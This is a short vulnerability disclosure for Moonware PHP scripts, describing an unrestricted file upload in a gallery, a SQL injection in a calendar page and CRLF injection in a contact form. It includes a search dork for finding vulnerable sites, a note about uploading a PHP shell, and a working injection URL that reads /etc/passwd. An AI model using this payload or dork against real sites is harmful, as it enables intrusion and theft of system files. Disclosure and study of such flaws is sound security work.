moonware-multi.txt

`Moonware Software Multiple Vulnerabilities  
  
by s0cratex  
--------  
MSN: s0cratex[at]nasa[dot]gov  
  
Moonware Homepage: http://dalemooney.lost-soldiers.com  
  
  
I. Moon Gallery  
---- -------  
  
Bug: Arbitrary file upload  
Dork: "Powered by: Dale Mooney Gallery"  
  
Details:  
  
The file /config/upload.php don't have any restriction,  
6:$target_path = $target_path . basename( $_FILES['uploadedfile']['name']);   
8:if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {  
  
U can upload a PHP Shell and found it in the subdir /images/  
  
  
II. Calendar Events  
-------- ------  
  
Bug: SQL Injections   
  
Details:  
The variable $get is not verified in the file viewevent.php. (We need magic_quotes_gpc = Off)  
  
8:$get = mysql_query("SELECT * FROM cal_events WHERE id = '$id'");  
p0c: viewevent.php?id=-1' union select 1,load_file('/etc/passwd'),1,1/*   
  
  
III. Moonware Contact Form  
-------- ------- ----  
  
Bug: CRLF Injection  
  
Details:  
  
File contact.php  
  
line 26-35  
if($Submit){  
  
$to = $email;  
$subject = $_POST["subject"];  
$email = $_POST["email"];  
$message = $_POST["message"];  
$name = $_POST["name"];  
$datetime = date("D, d M Y H:i:s");  
  
$finalmessage = "Message from: $name \n Subject: $subject \n Email: $email \n Date Sent: $datetime \n Message:\n\n $message";  
  
44:$sent = mail($to,$subject,$finalmessage);  
The vars are not verified and i can insert \r\n...  
  
oops!!   
#EOF  
`